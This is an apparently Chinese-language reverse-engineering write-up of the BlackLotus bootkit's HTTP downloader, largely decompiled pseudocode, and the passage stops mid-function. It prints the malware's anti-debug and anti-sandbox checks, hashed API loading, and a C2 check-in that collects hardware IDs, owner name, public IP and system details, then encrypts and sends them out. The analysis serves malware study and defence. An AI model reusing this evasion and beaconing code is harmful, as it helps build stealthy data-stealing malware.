目录
- BlackLotus 分析3--http_downloader
- start
- init_ntdll_api
- init_other_api
- communication_140004804
- msftncsi_140003FD4
- getinfo_140005DFC
- isUEFISecureBootEnabled_140005CB4
- get_HWID_MAC_VolumeSerialNumber_md5wstr
- get_RegisteredOwner_data_140006238
- get_publicip_1400059FC
- get_CurrentBuild_140005BA0
- get_ProcessorNameString_1400055A4
- get_GPU_info_140005758
- get_RAM_GB_140005C78
- get_ProductName_140005680
- get_IntegrityLevel_14000591C
- rsaenc_base64_140001370
- urlenc_140005498
- do_1400049F4
BlackLotus 分析3--http_downloader
inject_into_winlogon MZ魔术字改为HC的PE文件
start
反调试和反沙箱部分与安装器相同
__int64 start()
{
NtSetInformationThread((HANDLE)0xFFFFFFFFFFFFFFFEi64, ThreadHideFromDebugger, 0i64, 0);
init_ntdll_api();
if ( (unsigned int)is_default_locale_banned()
|| isBeingDebugged()
|| check_NtGlobalFlag()
|| is_being_debugged_ntqueryinformationprocess()
|| (unsigned int)is_kernel_debugger_present()
|| (unsigned int)is_being_debugged_by_vectored_exception_handler_int3()
|| (unsigned int)is_being_debugged_by_vectored_exception_handler_int2d()
|| (unsigned int)anti_sandbox_check_loaded_dlls_basename()
|| (unsigned int)anti_sandbox_check_loaded_dlls_fullname()
|| (unsigned int)anti_sandbox_check_processes_running()
|| (unsigned int)anti_sandbox_check_registry_key_present()
|| (unsigned int)anti_sandbox_check_registry_values()
|| (unsigned int)anti_sandbox_check_RSMB()
|| (unsigned int)anti_sandbox_check_ACPI()
|| (unsigned int)anti_sandbox_check_mac_addr()
|| (unsigned int)anti_sandbox_rdtsc() )
{
while ( 1 )
;
}
init_other_api();
while ( (unsigned int)communication_140004804() != 1 )
;
NtTerminateThread((HANDLE)0xFFFFFFFFFFFFFFFEi64, 1);
return 0i64;
}
init_ntdll_api
通过hash值加载api
void __stdcall init_ntdll_api()
{
struct _IMAGE_DOS_HEADER *ntdll; // rbx
ntdll = get_ntdll_and_unhook(0xD22E2014);
LdrGetProcedureAddress = (NTSTATUS (__stdcall *)(PVOID, PANSI_STRING, ULONG, PVOID *))get_proc_address_by_hash(
ntdll,
0xB08469DD,
0);
RtlInitUnicodeString = (void (__stdcall *)(PUNICODE_STRING, PCWSTR))get_proc_address_by_hash(ntdll, 0xC8D8F9F4, 0);
LdrLoadDll = (NTSTATUS (__stdcall *)(PWSTR, PULONG, PUNICODE_STRING, PVOID *))get_proc_address_by_hash(
ntdll,
0xF6CFC604,
0);
RtlAllocateHeap = (PVOID (__stdcall *)(PVOID, ULONG, SIZE_T))get_proc_address_by_hash(ntdll, 0x572D53D3u, 0);
RtlFreeHeap = (BOOLEAN (__stdcall *)(HANDLE, ULONG, PVOID))get_proc_address_by_hash(ntdll, 0x10DE9522u, 0);
RtlRemoveVectoredExceptionHandler = (ULONG (__stdcall *)(PVOID))get_proc_address_by_hash(ntdll, 0xBB26CCEB, 0);
RtlAddVectoredExceptionHandler = (PVOID (__stdcall *)(ULONG, PVECTORED_EXCEPTION_HANDLER))get_proc_address_by_hash(
ntdll,
0x89AB8454,
0);
wcsstr = (wchar_t *(__cdecl *)(const wchar_t *, const wchar_t *))get_proc_address_by_hash(ntdll, 0xB2AECB6A, 0);
itow = (wchar_t *(__cdecl *)(int, wchar_t *, int))get_proc_address_by_hash(ntdll, 0x839101F2, 0);
RtlSubAuthoritySid = (PULONG (__stdcall *)(PSID, ULONG))get_proc_address_by_hash(ntdll, 0x319CEA81u, 0);
RtlSubAuthorityCountSid = (PUCHAR (__stdcall *)(PSID))get_proc_address_by_hash(ntdll, 0xC96D110C, 0);
snwprintf = (int (*)(wchar_t *, size_t, const wchar_t *, ...))get_proc_address_by_hash(ntdll, 0x81E8EC96, 0);
RtlReAllocateHeap = (PVOID (__stdcall *)(HANDLE, ULONG, PVOID, SIZE_T))get_proc_address_by_hash(ntdll, 0x4D018A66u, 0);
wtoi = (int (__cdecl *)(const wchar_t *))get_proc_address_by_hash(ntdll, 0xEF06C56u, 0);
RtlWow64GetThreadContext = (NTSTATUS (__stdcall *)(HANDLE, PWOW64_CONTEXT))get_proc_address_by_hash(
ntdll,
0x5F6A5C62u,
0);
RtlWow64SetThreadContext = (NTSTATUS (__stdcall *)(HANDLE, PWOW64_CONTEXT))get_proc_address_by_hash(
ntdll,
0x31FC956u,
0);
RtlIdentifierAuthoritySid = (PSID_IDENTIFIER_AUTHORITY (__stdcall *)(PSID))get_proc_address_by_hash(
ntdll,
0xEF508FEu,
0);
}
init_other_api
BOOL *__stdcall init_other_api()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
// winhttp.dll
v0 = deobfuscate_wstring(word_14000ADB8, 0xCu, 1);
winhttp = load_library_w((__int64)v0);
// bcrypt.dll
v2 = deobfuscate_wstring(word_14000ADD8, 0xBu, 1);
bcrypt = load_library_w((__int64)v2);
// crypt32.dll
v4 = deobfuscate_wstring(word_14000ADF0, 0xCu, 1);
crypt32 = load_library_w((__int64)v4);
// kernel32.dll
v6 = deobfuscate_wstring(word_14000AE10, 0xDu, 1);
kernel32 = load_library_w((__int64)v6);
// advapi32.dll
v8 = deobfuscate_wstring(word_14000AE30, 0xDu, 1);
advapi32 = load_library_w((__int64)v8);
// wtsapi32.dll
v10 = deobfuscate_wstring(word_14000AE50, 0xDu, 1);
wtsapi32 = load_library_w((__int64)v10);
// userenv.dll
v12 = deobfuscate_wstring(word_14000AE70, 0xCu, 1);
userenv = load_library_w((__int64)v12);
WinHttpOpen = (HINTERNET (__stdcall *)(LPCWSTR, DWORD, LPCWSTR, LPCWSTR, DWORD))get_proc_address_by_hash(
winhttp,
0x8EAD24EE,
0);
WinHttpConnect = (HINTERNET (__stdcall *)(HINTERNET, LPCWSTR, INTERNET_PORT, DWORD))get_proc_address_by_hash(
winhttp,
0xAF02EC06,
0);
WinHttpOpenRequest = (HINTERNET (__stdcall *)(HINTERNET, LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR *, DWORD))get_proc_address_by_hash(winhttp, 0xF1EA7021, 0);
WinHttpSendRequest = (BOOL (__stdcall *)(HINTERNET, LPCWSTR, DWORD, LPVOID, DWORD, DWORD, DWORD_PTR))get_proc_address_by_hash(winhttp, 0xFACA0A03, 0);
WinHttpReceiveResponse = (BOOL (__stdcall *)(HINTERNET, LPVOID))get_proc_address_by_hash(winhttp, 0xBFDC2C0u, 0);
WinHttpReadData = (BOOL (__stdcall *)(HINTERNET, LPVOID, DWORD, LPDWORD))get_proc_address_by_hash(
winhttp,
0x66408124u,
0);
WinHttpCloseHandle = (BOOL (__stdcall *)(HINTERNET))get_proc_address_by_hash(winhttp, 0xA8EDA2BC, 0);
WinHttpQueryHeaders = (BOOL (__stdcall *)(HINTERNET, DWORD, LPCWSTR, LPVOID, LPDWORD, LPDWORD))get_proc_address_by_hash(
winhttp,
0x674823C2u,
0);
WinHttpQueryDataAvailable = (BOOL (__stdcall *)(HINTERNET, LPDWORD))get_proc_address_by_hash(winhttp, 0xA882FF5B, 0);
WinHttpSetOption = (BOOL (__stdcall *)(HINTERNET, DWORD, LPVOID, DWORD))get_proc_address_by_hash(
winhttp,
0xACEE6AF3,
0);
CreateEnvironmentBlock = (BOOL (__stdcall *)(LPVOID *, HANDLE, BOOL))get_proc_address_by_hash(userenv, 0x7E20FED6u, 0);
DestroyEnvironmentBlock = (BOOL (__stdcall *)(LPVOID))get_proc_address_by_hash(userenv, 0x4AF5EC14u, 0);
WTSEnumerateSessionsW = (BOOL (__stdcall *)(HANDLE, DWORD, DWORD, PWTS_SESSION_INFOW *, DWORD *))get_proc_address_by_hash(
wtsapi32,
0xBDB0B9AC,
0);
WTSQueryUserToken = (BOOL (__stdcall *)(ULONG, PHANDLE))get_proc_address_by_hash(wtsapi32, 0x5B88473Cu, 0);
WTSFreeMemory = (void (__stdcall *)(PVOID))get_proc_address_by_hash(wtsapi32, 0xE51007E3, 0);
WTSQuerySessionInformationW = (BOOL (__stdcall *)(HANDLE, DWORD, WTS_INFO_CLASS, LPWSTR *, DWORD *))get_proc_address_by_hash(wtsapi32, 0x4A851ECFu, 0);
CreateProcessAsUserW = (BOOL (__stdcall *)(HANDLE, LPCWSTR, LPWSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION))get_proc_address_by_hash(advapi32, 0x7C259F87u, 0);
Sleep = (void (__stdcall *)(DWORD))get_proc_address_by_hash(kernel32, 0xD8A41517, 0);
GlobalMemoryStatusEx = (BOOL (__stdcall *)(LPMEMORYSTATUSEX))get_proc_address_by_hash(kernel32, 0x6DBFC569u, 0);
WideCharToMultiByte = (int (__stdcall *)(UINT, DWORD, LPCWCH, int, LPSTR, int, LPCCH, LPBOOL))get_proc_address_by_hash(
kernel32,
0x45C481FDu,
0);
LoadLibraryA = (HMODULE (__stdcall *)(LPCSTR))get_proc_address_by_hash(kernel32, 0xDF2BBBEC, 0);
GetProcAddress = (FARPROC (__stdcall *)(HMODULE, LPCSTR))get_proc_address_by_hash(kernel32, 0x80E96588, 0);
BCryptOpenAlgorithmProvider = (NTSTATUS (__stdcall *)(BCRYPT_ALG_HANDLE *, LPCWSTR, LPCWSTR, ULONG))get_proc_address_by_hash(bcrypt, 0xC694168A, 0);
BCryptGetProperty = (NTSTATUS (__stdcall *)(BCRYPT_HANDLE, LPCWSTR, PUCHAR, ULONG, ULONG *, ULONG))get_proc_address_by_hash(bcrypt, 0x5239823Fu, 0);
BCryptCreateHash = (NTSTATUS (__stdcall *)(BCRYPT_ALG_HANDLE, BCRYPT_HASH_HANDLE *, PUCHAR, ULONG, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(bcrypt, 0x9144E6F6, 0);
BCryptHashData = (NTSTATUS (__stdcall *)(BCRYPT_HASH_HANDLE, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(
bcrypt,
0xBC045064,
0);
BCryptFinishHash = (NTSTATUS (__stdcall *)(BCRYPT_HASH_HANDLE, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(
bcrypt,
0x5BF0EF2Du,
0);
BCryptDestroyHash = (NTSTATUS (__stdcall *)(BCRYPT_HASH_HANDLE))get_proc_address_by_hash(bcrypt, 0x4F7C041Cu, 0);
BCryptCloseAlgorithmProvider = (NTSTATUS (__stdcall *)(BCRYPT_ALG_HANDLE, ULONG))get_proc_address_by_hash(
bcrypt,
0x1ACC1354u,
0);
BCryptEncrypt = (NTSTATUS (__stdcall *)(BCRYPT_KEY_HANDLE, PUCHAR, ULONG, void *, PUCHAR, ULONG, PUCHAR, ULONG, ULONG *, ULONG))get_proc_address_by_hash(bcrypt, 0x63BF14B9u, 0);
BCryptDestroyKey = (NTSTATUS (__stdcall *)(BCRYPT_KEY_HANDLE))get_proc_address_by_hash(bcrypt, 0xB241FED1, 0);
BCryptGenRandom = (NTSTATUS (__stdcall *)(BCRYPT_ALG_HANDLE, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(
bcrypt,
0x3EC63647u,
0);
BCryptDecrypt = (NTSTATUS (__stdcall *)(BCRYPT_KEY_HANDLE, PUCHAR, ULONG, void *, PUCHAR, ULONG, PUCHAR, ULONG, ULONG *, ULONG))get_proc_address_by_hash(bcrypt, 0xC604BB01, 0);
BCryptGenerateSymmetricKey = (NTSTATUS (__stdcall *)(BCRYPT_ALG_HANDLE, BCRYPT_KEY_HANDLE *, PUCHAR, ULONG, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(bcrypt, 0x5CD9DC29u, 0);
BCryptSetProperty = (NTSTATUS (__stdcall *)(BCRYPT_HANDLE, LPCWSTR, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(
bcrypt,
0x2163244Bu,
0);
CryptBinaryToStringW = (BOOL (__stdcall *)(const BYTE *, DWORD, DWORD, LPWSTR, DWORD *))get_proc_address_by_hash(
crypt32,
0xBA9252BC,
0);
CryptBinaryToStringA = (BOOL (__stdcall *)(const BYTE *, DWORD, DWORD, LPSTR, DWORD *))get_proc_address_by_hash(
crypt32,
0xBA9252A6,
0);
CryptDecodeObjectEx = (BOOL (__stdcall *)(DWORD, LPCSTR, const BYTE *, DWORD, DWORD, PCRYPT_DECODE_PARA, void *, DWORD *))get_proc_address_by_hash(crypt32, 0xE57C09CE, 0);
CryptImportPublicKeyInfoEx2 = (BOOL (__stdcall *)(DWORD, PCERT_PUBLIC_KEY_INFO, DWORD, void *, BCRYPT_KEY_HANDLE *))get_proc_address_by_hash(crypt32, 0x95F5B5CE, 0);
CryptStringToBinaryA = (BOOL (__stdcall *)(LPCSTR, DWORD, DWORD, BYTE *, DWORD *, DWORD *, DWORD *))get_proc_address_by_hash(crypt32, 0xDD36B2A6, 0);
result = (BOOL *)get_proc_address_by_hash(crypt32, 0xDD36B2BC, 0);
CryptStringToBinaryW = (BOOL (__stdcall *)(LPCWSTR, DWORD, DWORD, BYTE *, DWORD *, DWORD *, DWORD *))result;
return result;
}
communication_140004804
http通信部分
__int64 communication_140004804()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
memset(&httpst, 0, sizeof(httpst));
httpst.sleep_dwMilliseconds = 0xEA60;
httpst.RoundIndex = 1;
v0 = 0i64;
Heap = 0i64;
v2 = 0;
Sleep(10000u);
// Mozilla/5.0
pszAgentW = deobfuscate_wstring(word_14000B0A8, 0xCu, 1);
httpst.hSession = WinHttpOpen(pszAgentW, 0, 0i64, 0i64, 0);
if ( httpst.hSession )
{
while ( !(unsigned int)msftncsi_140003FD4(&httpst.hSession) )// 检测网络连接
Sleep(10000u);
info_enc = getinfo_140005DFC(httpst.hSession);
v0 = info_enc;
if ( info_enc )
{
v5 = strlen(info_enc) + 0x33;
Heap = (char *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v5);
if ( Heap )
{
// checkin=
v6 = deobfuscate_bytes(checkin_14000B0C8, 9u, 1);
if ( v5 )
{
if ( v5 <= 0x7FFFFFFF )
{
v7 = v5;
v8 = Heap;
v9 = v6 - (BYTE *)Heap;
do
{
if ( !(2147483646 - v5 + v7) )
break;
v10 = v8[v9];
if ( !v10 )
break;
*v8++ = v10;
--v7;
}
while ( v7 );
v11 = v8 - 1;
if ( v7 )
v11 = v8;
*v11 = 0;
}
else
{
*Heap = 0;
}
} // checkin=
strcat(Heap, (const char *)v5); // 拼接checkin=和info_enc
do
{
if ( (unsigned int)msftncsi_140003FD4(&httpst.hSession) )
v2 = do_1400049F4(&httpst, Heap);
Sleep(httpst.sleep_dwMilliseconds);
}
while ( !v2 );
}
}
}
freebuf_1400073F4(&httpst.DataST_20);
if ( Heap )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);
if ( v0 )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v0);
if ( httpst.hSession )
WinHttpCloseHandle(httpst.hSession);
return v2;
}
msftncsi_140003FD4
__int64 __fastcall msftncsi_140003FD4(HINTERNET *hSession)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v1 = 0;
v10 = 4;
if ( *hSession )
{
// www.msftncsi.com
pswzServerName = deobfuscate_wstring(word_14000B058, 0x11u, 1);
hConnect = WinHttpConnect(*hSession, pswzServerName, 0x50u, 0);
if ( hConnect )
{
// /ncsi.txt
pwszObjectName = deobfuscate_wstring(word_14000B080, 0xAu, 0);
// GET
pwszVerb = deobfuscate_wstring(word_14000B098, 4u, 0);
hRequest = WinHttpOpenRequest(hConnect, pwszVerb, pwszObjectName, 0i64, 0i64, 0i64, 0);
hRequest1 = hRequest;
if ( hRequest )
{
if ( WinHttpSendRequest(hRequest, 0i64, 0, 0i64, 0, 0, 0i64)
&& WinHttpReceiveResponse(hRequest1, 0i64)
&& WinHttpQueryHeaders(hRequest1, 0x20000013u, 0i64, &status, &v10, 0i64)// WINHTTP_QUERY_STATUS_CODE
&& status == HTTP_STATUS_OK )
{
v1 = 1;
}
WinHttpCloseHandle(hRequest1);
}
WinHttpCloseHandle(hConnect);
}
}
return v1;
}
getinfo_140005DFC
CHAR *__fastcall getinfo_140005DFC(HINTERNET hSession)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v43 = 0i64;
RegisteredOwnerData1 = 0i64;
publicip1 = 0i64;
CurrentBuild_1 = 0i64;
CPUinfo1 = 0i64;
GPUinfo1 = 0i64;
v6 = 0i64;
v7 = 4i64;
isUEFISecureBootEnabled = isUEFISecureBootEnabled_140005CB4();
// ???
v8 = deobfuscate_wstring(word_14000B430, 4u, 1);
ptr = &unknown; // ???
v10 = (char *)v8 - &unknown;
do
{
if ( v7 == -2147483642 )
break;
v11 = *(_WORD *)&ptr[v10];
if ( !v11 )
break;
*(_WORD *)ptr = v11;
ptr += 2;
--v7;
}
while ( v7 );
v12 = ptr - 2;
if ( v7 )
v12 = ptr;
*(_WORD *)v12 = 0;
HWID = get_HWID_MAC_VolumeSerialNumber_md5wstr();//作为后续通信的aeskey
if ( HWID )
{
if ( gSession_RNG_14000F568 || (gSession_RNG_14000F568 = csprng_uint32()) != 0 )
{
RegisteredOwnerData = get_RegisteredOwner_data_140006238();
RegisteredOwnerData1 = &unknown;
if ( RegisteredOwnerData )
RegisteredOwnerData1 = (char *)RegisteredOwnerData;
if ( (unsigned int)wcslen((wchar_t *)RegisteredOwnerData1) <= 0xFF )
{
publicip = (char *)get_publicip_1400059FC(hSession);// 通过api.ipify.org获取公网ip
publicip1 = &unknown;
if ( publicip )
publicip1 = publicip;
CurrentBuild = get_CurrentBuild_140005BA0();// 获取系统bulidnumber
CurrentBuild_1 = &unknown;
if ( CurrentBuild )
CurrentBuild_1 = (char *)CurrentBuild;
if ( (unsigned int)wcslen((wchar_t *)CurrentBuild_1) <= 0x32 )
{
CPUinfo = get_ProcessorNameString_1400055A4();// 获取处理器信息
CPUinfo1 = &unknown;
if ( CPUinfo )
CPUinfo1 = (char *)CPUinfo;
GPUinfo = get_GPU_info_140005758(); // 获取GPU信息,SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT 可能不存在0.0
GPUinfo1 = &unknown;
if ( GPUinfo )
GPUinfo1 = (char *)GPUinfo;
RAM_GB = get_RAM_GB_140005C78(); // 获取内存大小
if ( !RAM_GB )
RAM_GB = 1977;
RAM_GB1 = RAM_GB;
ProductName_140005680 = get_ProductName_140005680();// 获取ProductName,系统版本名
ProductName = &unknown;
if ( ProductName_140005680 )
ProductName = (char *)ProductName_140005680;
v44 = ProductName;
dwIntegrityLevel = get_IntegrityLevel_14000591C();// 获取当前的完整性级别 IntegrityLevel SECURITY_MANDATORY_
IntegrityLevel1 = dwIntegrityLevel;
// SECURITY_MANDATORY_UNTRUSTED_RID->0
if ( !dwIntegrityLevel || dwIntegrityLevel == SECURITY_MANDATORY_SYSTEM_RID && !set_cmd_P_1400082B8() )
IntegrityLevel1 = 1977;
relpace_sep_1400052B4(RegisteredOwnerData1);// relpace "--> -
relpace_sep_1400052B4(publicip1);
relpace_sep_1400052B4(CurrentBuild_1);
relpace_sep_1400052B4(CPUinfo1);
relpace_sep_1400052B4(GPUinfo1);
relpace_sep_1400052B4(ProductName);
v22 = wcslen((wchar_t *)ProductName);
v23 = wcslen((wchar_t *)GPUinfo1) + v22;
v24 = wcslen((wchar_t *)CPUinfo1) + v23;
v25 = wcslen((wchar_t *)CurrentBuild_1) + v24;
v26 = wcslen((wchar_t *)publicip1) + v25;
v27 = wcslen((wchar_t *)RegisteredOwnerData1) + v26;
v28 = wcslen(HWID) + 0xA5 + v27;
v48 = v28;
ProcessHeap = NtCurrentPeb()->ProcessHeap;
bufsz = v28 + 150;
buf = (wchar_t *)RtlAllocateHeap(ProcessHeap, 8u, 2 * bufsz);
if ( buf )
{
// {"HWID":"%s", "Session":"%lu", "Owner":"%s", "IP":"%s", "OS":"%s", "Edition":"%s", "CPU":"%s", "GPU":"%s", "RAM":"%lu", "Integrity":"%lu", "SecureBoot":"%i", "Build":"%lu"}
v31 = deobfuscate_wstring(word_14000B440, 0xADu, 0);
GPUinfo11 = &unknown;
formatstr = v31;
CPUinfo11 = &unknown;
ProductName_1 = &unknown;
v36 = v28 < 0x1F4;
publicip11 = &unknown;
v6 = v44;
if ( v36 )
{
GPUinfo11 = GPUinfo1;
if ( v36 )
{
CPUinfo11 = CPUinfo1;
if ( v36 )
ProductName_1 = v44;
}
}
if ( v48 < 0x1F4 )
publicip11 = publicip1;
// {
// "HWID": "%s",
// "Session": "%lu",
// "Owner": "%s",
// "IP": "%s",
// "OS": "%s",
// "Edition": "%s",
// "CPU": "%s",
// "GPU": "%s",
// "RAM": "%lu",
// "Integrity": "%lu",
// "SecureBoot": "%i",
// "Build": "%lu"
// }
if ( snwprintf(
buf,
bufsz,
formatstr,
HWID,
gSession_RNG_14000F568,
RegisteredOwnerData1,
publicip11,
CurrentBuild_1,
ProductName_1,
CPUinfo11,
GPUinfo11,
RAM_GB1,
IntegrityLevel1,
isUEFISecureBootEnabled,
29082022) >= 0 ) // ??2022 08 29
{
wcslen(buf);
v38 = rsaenc_base64_140001370(buf);// rsa公钥加密,base64编码
v43 = v38;
if ( v38 )
v43 = urlenc_140005498(v38, 1);
}
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, buf);
}
else
{
v6 = v44;
}
}
}
}
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, HWID);
if ( RegisteredOwnerData1 && RegisteredOwnerData1 != &unknown )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, RegisteredOwnerData1);
if ( v6 && v6 != &unknown )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v6);
if ( publicip1 && publicip1 != &unknown )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, publicip1);
if ( CurrentBuild_1 && CurrentBuild_1 != &unknown )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, CurrentBuild_1);
if ( CPUinfo1 && CPUinfo1 != &unknown )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, CPUinfo1);
if ( GPUinfo1 && GPUinfo1 != &unknown )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, GPUinfo1);
}
return v43;
}
isUEFISecureBootEnabled_140005CB4
_BOOL8 isUEFISecureBootEnabled_140005CB4()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
ret = 0;
Handle = 0i64;
ResultLength = 0;
// \Registry\Machine\SYSTEM\CurrentControlSet\Control\SecureBoot\State
v1 = deobfuscate_wstring(word_14000B370, 0x44u, 1);
RtlInitUnicodeString(&v6, v1);
v7.Length = 48;
v7.ObjectName = &v6;
v7.RootDirectory = 0i64;
v7.Attributes = 64;
*(_OWORD *)&v7.SecurityDescriptor = 0i64;
if ( NtOpenKey(&Handle, 1u, &v7) >= 0 )
{
// UEFISecureBootEnabled
v2 = deobfuscate_wstring(word_14000B400, 0x16u, 1);
RtlInitUnicodeString(&ValueName, v2);
NtQueryValueKey(Handle, &ValueName, KeyValuePartialInformation, 0i64, 0, &ResultLength);
keyvalueinfo = (KEY_VALUE_PARTIAL_INFORMATION *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, ResultLength);
if ( keyvalueinfo )
{
if ( NtQueryValueKey(Handle, &ValueName, KeyValuePartialInformation, keyvalueinfo, ResultLength, &ResultLength) >= 0
&& keyvalueinfo->Type == REG_DWORD )
{
LOBYTE(ret) = *(_DWORD *)keyvalueinfo->Data == 1;
}
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, keyvalueinfo);
}
NtClose(Handle);
}
return ret;
}
get_HWID_MAC_VolumeSerialNumber_md5wstr
_WORD *get_HWID_MAC_VolumeSerialNumber_md5wstr()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v0 = 0i64;
if ( (unsigned int)getMAC_1400076F0(mac) )
{
VolumeSerialNumber = get_VolumeSerialNumber_1400078C4();
if ( VolumeSerialNumber )
{
v9[6] = VolumeSerialNumber;
*(_WORD *)&v9[7] = VolumeSerialNumber >> 8;
*(_DWORD *)v9 = *(_DWORD *)mac;
*(_WORD *)&v9[4] = *(_WORD *)&mac[4];
v9[9] = HIBYTE(VolumeSerialNumber);
// MAC+VolumeSerialNumber 6+4 =10byte
if ( (unsigned int)md5_1400017B0(v9, 0xAu, md5str) )
{
Heap = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x42ui64);
v0 = Heap;
if ( Heap )
{
v3 = Heap;
v4 = 33i64;
v5 = (char *)((char *)md5str - (char *)Heap);
do
{
if ( v4 == -2147483613 )
break;
v6 = *(_WORD *)((char *)v3 + (_QWORD)v5);
if ( !v6 )
break;
*v3++ = v6;
--v4;
}
while ( v4 );
v7 = v3 - 1;
if ( v4 )
v7 = v3;
*v7 = 0;
}
}
}
}
return v0;
}
__int64 __fastcall getMAC_1400076F0(PVOID OutputBuffer)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v1 = 0;
FileHandle = 0i64;
// {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
netServiceName = getNetworkCards_ServiceName_140007A1C();
Heap = 0i64;
InputBuffer = OID_802_3_PERMANENT_ADDRESS;
v5 = netServiceName;
if ( netServiceName )
{
Data = (wchar_t *)netServiceName->Data;
v7 = wcslen((wchar_t *)netServiceName->Data);
Heap = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (unsigned int)(v7 + 0xA));
if ( Heap )
{
// \Device\
v8 = (unsigned int)deobfuscate_wstring(word_14000B8B0, 9u, 1);
v9 = wcslen(Data);
wcsncpy_0(Heap, (const wchar_t *)(unsigned int)(v9 + 10), v8);// \Device\
v10 = wcslen(Data);
wscat(Heap, (unsigned int)(v10 + 10), (__int64)Data);// \Device\{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
RtlInitUnicodeString(&DestinationString, Heap);
ObjectAttributes.RootDirectory = 0i64;
ObjectAttributes.Length = 48;
ObjectAttributes.Attributes = 64;
ObjectAttributes.ObjectName = &DestinationString;
*(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
if ( NtCreateFile(&FileHandle, 0xC0000000, &ObjectAttributes, &IoStatusBlock, 0i64, 0x80u, 1u, 1u, 0, 0i64, 0) >= 0
&& NtDeviceIoControlFile(
FileHandle,
0i64,
0i64,
0i64,
&IoStatusBlock,
IOCTL_NDIS_QUERY_GLOBAL_STATS,
&InputBuffer,
4u,
OutputBuffer,
6u) >= 0 )
{
v1 = 1;
}
}
}
if ( FileHandle )
NtClose(FileHandle);
if ( Heap )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);
if ( v5 )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v5);
return v1;
}
__int64 get_VolumeSerialNumber_1400078C4()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
VolumeSerialNumber = 0;
FileHandle = 0i64;
v1 = 0i64;
v2 = 0;
// \SystemRoot\
v3 = deobfuscate_wstring(word_14000B7D0, 0xDu, 1);
RtlInitUnicodeString(&v7, v3);
ObjectAttributes.Length = 48;
ObjectAttributes.RootDirectory = 0i64;
ObjectAttributes.Attributes = 64;
ObjectAttributes.ObjectName = &v7;
*(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
if ( NtCreateFile(
&FileHandle,
FILE_GENERIC_READ,
&ObjectAttributes,
&IoStatusBlock,
0i64,
FILE_ATTRIBUTE_NORMAL,
3u,
1u,
1u,
0i64,
0) >= 0 )
{
while ( 1 )
{
if ( v1 )
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v1);
v2 += 1024;
Heap = (FILE_FS_VOLUME_INFORMATION *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v2);
v1 = Heap;
if ( !Heap )
break;
v5 = NtQueryVolumeInformationFile(FileHandle, &IoStatusBlock, Heap, v2, FileFsVolumeInformation);
if ( v5 != -1073741789 )
{
if ( v5 >= 0 )
VolumeSerialNumber = v1->VolumeSerialNumber;
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v1);
return VolumeSerialNumber;
}
}
}
return VolumeSerialNumber;
}
get_RegisteredOwner_data_140006238
wchar_t *get_RegisteredOwner_data_140006238()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
// \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
v0 = deobfuscate_wstring(gCurrentVersion_14000B0E0, 0x3Fu, 1);
v1 = CurrentVersion;
v2 = 64i64;
v3 = (char *)v0 - (char *)CurrentVersion;
do
{
if ( v2 == -2147483582 )
break;
v4 = *(__int16 *)((char *)v1 + v3);
if ( !v4 )
break;
*v1++ = v4;
--v2;
}
while ( v2 );
v5 = v1 - 1;
v6 = 16i64;
if ( v2 )
v5 = v1;
*v5 = 0;
// RegisteredOwner
v7 = (char *)deobfuscate_wstring(word_14000B160, 0x10u, 1) - (char *)RegisteredOwner;
v8 = RegisteredOwner;
do
{
if ( v6 == -2147483630 )
break;
v9 = *(__int16 *)((char *)v8 + v7);
if ( !v9 )
break;
*v8++ = v9;
--v6;
}
while ( v6 );
v10 = v8 - 1;
if ( v6 )
v10 = v8;
*v10 = 0;
